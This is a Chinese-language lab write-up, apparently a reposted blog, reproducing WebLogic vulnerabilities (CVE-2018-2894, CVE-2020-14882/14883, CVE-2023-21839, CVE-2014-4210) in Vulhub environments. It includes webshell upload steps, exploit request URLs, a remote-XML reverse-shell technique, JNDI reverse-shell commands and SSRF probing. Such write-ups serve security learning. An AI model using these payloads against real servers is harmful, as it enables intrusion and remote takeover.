Vulhub WebLogic漏洞复现
目录[*]媒介
[*]恣意文件上传漏洞(CVE-2018-2894)
[*]管理控制台未授权RCE漏洞(CVE-2020-14882 & CVE-2020-14883)
[*]未授权RCE漏洞(CVE-2023-21839)
[*]SSRF漏洞(CVE-2014-4210)
媒介
前面两篇针对WebLogic存在的XMLDecoder和T3协议反序列化漏洞进行了分析和复现,这里继续借助vulhub来复现WebLogic的其他漏洞。
恣意文件上传漏洞(CVE-2018-2894)
漏洞编号为CVE-2018-2894,WebLogic管理端未授权的页面存在恣意上传文件漏洞,可直接getshell获取权限。
影响版本:weblogic:10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3
复现环境:
cd ./vulhub/weblogic/CVE-2018-2894
docker compose up -d首先执行docker compose logs | grep password查看管理员weblogic的密码,登录后台页面。
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608181950685-942863805.png
依次点击:base_domain -> 高级 -> 启用Web服务测试页 -> 保存
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608182345177-459165828.png
访问/ws_utc/config.do设置 Work Home Dir 为:
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css然后尝试上传一个哥斯拉的jsp木马:
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608185753826-379914484.png
使用Burp拦截上传提交请求:
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608191123117-1052086083.png
可以看到上传文件的路径/ws_utc/css/config/keystore/和一个时间戳timestamp,然后这个时间戳会和上传的文件的文件名合成一个新的文件名[时间戳]_[文件名],比如1717844040229_ggggg.jsp。
尝试使用哥斯拉毗连webshell:
http://192.168.88.150:7001/ws_utc/css/config/keystore/1717844040229_ggggg.jsphttps://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608185956770-1077651047.png
哥斯拉毗连成功。
管理控制台未授权RCE漏洞(CVE-2020-14882 & CVE-2020-14883)
这个漏洞是由CVE-2020-14883权限绕过漏洞和代码执行漏洞CVE-2020-14882组合起来造成的。可以实现未授权的用户绕过管理控制台的权限验证访问后台,通过一个GET请求在远程Weblogic服务器上以未授权的恣意用户身份执行命令。
影响版本:weblogic 10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0
复现环境:
cd ./vulhub/weblogic/CVE-2020-14882
docker compose up -d首先CVE-2020-14883允许未授权访问后台:
/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608172501274-456564149.png
然后利用CVE-2020-14882远程执行代码:
方式一:
利用com.tangosol.coherence.mvel2.sh.ShellSession直接执行命令。但是这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10.3.6并不存在这个类。
/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27ping a98lh6.dnslog.cn%27);%22)https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608173704898-957434213.png
方式二:
利用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext加载并执行远程的xml文件,这也是一种更加普遍的方式。
首先需要构造一个xml文件,用来反弹shell:
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb"init-method="start">
<constructor-arg>
<list>
<value>/bin/bash</value>
<value>-c</value>
<value><!]></value>
</list>
</constructor-arg>
</bean>
</beans>在服务器起一个 python http.server 使靶机可以访问到该xml文件:
python -m http.server 8000https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608175628813-1288835588.png
尝试通过FileSystemXmlApplicationContext执行远端xml文件:
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://192.168.88.150:8000/exp.xml")监听1234端口拿到反弹shell:
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608180526437-1331366178.png
该方法的好处在于weblogic版本限定小,在12.2.1.3以及10.3.6版本都可以执行。
未授权RCE漏洞(CVE-2023-21839)
漏洞编号为CVE-2023-21839,允许远程用户在未经授权的情况下通过IIOP/T3进行JNDI lookup操作,当 JDK 版本过低或当地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。
影响版本:weblogic:12.2.1.3.0,12.2.1.4.0,14.1.1.0.0
复现环境:
cd ./vulhub/weblogic/CVE-2023-21839
docker compose up -dJNDI注入的利用:
首先需要使用 JNDIExploit-1.2-SNAPSHOT.jar 启动一个LADP服务默认监听在1389端口,8080端口实现恶意类的加载。
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 192.168.88.128
-i 指定LDAP服务的IP地址(本机)https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608200834860-932028086.png
然后使用 Weblogic-CVE-2023-21839.jar 工具,这里利用LDAP服务的/Basic/ReverseShell/达到反弹shell的目的。
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608202735713-1530364913.png
执行exp向靶机进行JNDI注入:
java -jar Weblogic-CVE-2023-21839.jar weblogic-ip:7001 ldap://ldapserver-ip:1389/Basic/ReverseShell/nc-ip:nc-porthttps://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608202159071-1031306187.png
靶机被攻击后,会向LDAP服务端进行LDAP查询请求,然后LDAP服务端将请求重定向到8080端口的http服务,靶机再去请求LDAP服务端的8080端口加载反弹shell的恶意类。
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608202246389-357670888.png
当shell的恶意类的类被执行后,监听1234端口拿到shell:
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608202227701-1909336903.png
此漏洞有是出在T3和IIOP协议上,所以禁用T3和IIOP协议真的很有必要。
SSRF漏洞(CVE-2014-4210)
漏洞编号为CVE-2014-4210,服务端请求伪造SSRF漏洞出现uddiexplorer.war下的 SearchPublicRegistries.jsp
影响版本:weblogic 10.0.2,10.3.6
漏洞环境:
cd ./vulhub/weblogic/ssrf
docker compose up -dSSRF漏洞存在于/uddiexplorer/SearchPublicRegistries.jsp页面:
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608211746756-1870537595.png
使用Burp拦截,可以看到operator参数是一个UR地址,试着访问一下当地http://127.0.0.1:7001:
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608212605757-226216347.png
随便修改为一个不存在的端口:
https://img2024.cnblogs.com/blog/3222269/202406/3222269-20240608212741445-1173175745.png
回显了不同的内容,所以可以通过回显错误的不同,探测内网状态。
靶场还提供了一个注入HTTP头,利用Redis反弹shell的环境。通过注入CRLF(%0a%0d)利用redis通过换行符来分隔每条命令的特点,来攻击内网中的redis服务器。
但比较惋惜的是,我复现的这个环境采用的是POST传数据,没有CRLF注入HTTP头部的这个利用点。
vulhub还提供了一个后台存在一个弱口令,而且前台存在恣意文件读取漏洞。
主要就是获取账户的明文密码,爆破弱口令就端赖字典的强弱了(和亿点运气)。大概是读取后台用户密文与密钥文件SerializedSystemIni.dat进行破解明文密码。如果可以读敏感文件比如passwd和shadow文件,可以进行hash破解获取明文密码(这个不是后台密码)。
参考文章:
https://vulhub.org/#/environments/
若有错误,接待指正!o( ̄▽ ̄)ブ
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]